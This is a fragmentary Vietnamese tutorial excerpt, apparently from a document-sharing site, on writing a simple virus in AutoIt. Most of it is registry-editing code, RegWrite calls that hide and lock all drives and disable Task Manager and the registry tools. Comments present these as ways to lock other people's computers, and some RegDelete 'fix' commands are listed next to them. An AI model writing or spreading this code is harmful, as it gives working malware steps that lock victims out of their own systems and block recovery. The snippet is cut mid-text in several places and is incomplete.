Ngày tải lên :
15/12/2013, 14:15
... Thanhcuong1990@gmail.com
Để viết một chương trình virus đơn giản, đầu tiên các bạn phải down chương
trình về tại đây
AutoIt Script Home Page
Link direct: ...
Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","671088
63")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108
863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ
đĩa, "67108863" > là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
rentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\Explorer","NoDrives")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
rentVersion\Policies\Explorer","NoDrives")
Lệnh ...
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
rentVersion\Run","explorer")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\System","DisableTaskMgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
rentVersion\Policies\System","DisableTaskMgr")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
...